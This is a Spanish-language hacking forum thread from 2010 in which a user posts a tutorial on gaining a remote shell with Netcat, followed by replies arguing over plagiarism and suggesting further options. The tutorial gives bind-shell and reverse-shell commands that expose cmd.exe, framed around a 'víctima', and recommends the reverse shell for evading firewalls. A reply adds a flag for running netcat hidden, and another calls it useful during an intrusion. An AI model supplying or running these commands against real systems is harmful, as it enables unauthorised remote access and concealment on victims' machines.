Conseguir Shell con Netcat

Iniciado por Pyr0s, 10 Enero 2010, 15:25 PM

0 Miembros y 1 Visitante están viendo este tema.

Pyr0s

Conseguir Shell en Netcat

Autor: Pyr0s
Foro: Evolution

Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls  

Conexión Directa

En este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente:


Citarnc -l -p 123 -e cmd.exe

-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto
-e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)


Ese sería el comando que tendría que ejecutar la víctima


CitarTelnet 192.168.1.33 123

Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell  

Inversa


Citarnc -v -l -p 123

-v: Informa del estado de Netcat
-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto


Esos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos


Citarnc 192.168.1.33 123 -e cmd.exe

Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima  

Esto es todo, espero que os haya gustado el tutorial    :P

Saludos!

n3w

Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

Pyr0s

#2
Cita de: n3w en 10 Enero 2010, 16:31 PM
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

DIOS! que dices loco pero si lo hice yo sin copiar nada aver vamos por puntos:

  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador? EDITO: Con la pública u.u

  • No digas que lo he copiado sin tener ni idea  ;), ¿la pregunta que era a pillar?

    Saludos!

Shell Root

Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


Cita de: Pyr0s en 10 Enero 2010, 16:38 PM
  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

Cita de: Pyr0s en 10 Enero 2010, 16:38 PMcreo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Pyr0s

Cita de: Shell Root en 10 Enero 2010, 16:53 PM
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


Cita de: Pyr0s en 10 Enero 2010, 16:38 PM
  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

Cita de: Pyr0s en 10 Enero 2010, 16:38 PMcreo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!

... esto ... gracias! xD ya modifique un poco el post, gracias la verdad es que mas salvado xD

Saludos!

Shell Root

PD: Intenta jugar con los parametros del NetCat.
Por Ejemplo:
-d Significa que desvincula a netcat del cmd y lo hace trabajar en modo oculto.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

fede_cp

claro, las conexiones ya estás mas que aprendidas (no es para tirarte abajo, vale la intension), pero el netcat tiene bastantes parametros, para hacer combinaciones y generar nuevas funciones o cosas, por eso el creador dice, el netcat sirve para 1001 vainas :P.



saludos!
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

[L]ord [R]NA

Hay tantos tutos en Internet de como obtener una shell con Netcat como lo penszamientos Sadomasoquistas del payaso de McDonald :xD

Pyr0s

Motivais como nadie para que la gente aporte  ;)

Debci

A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos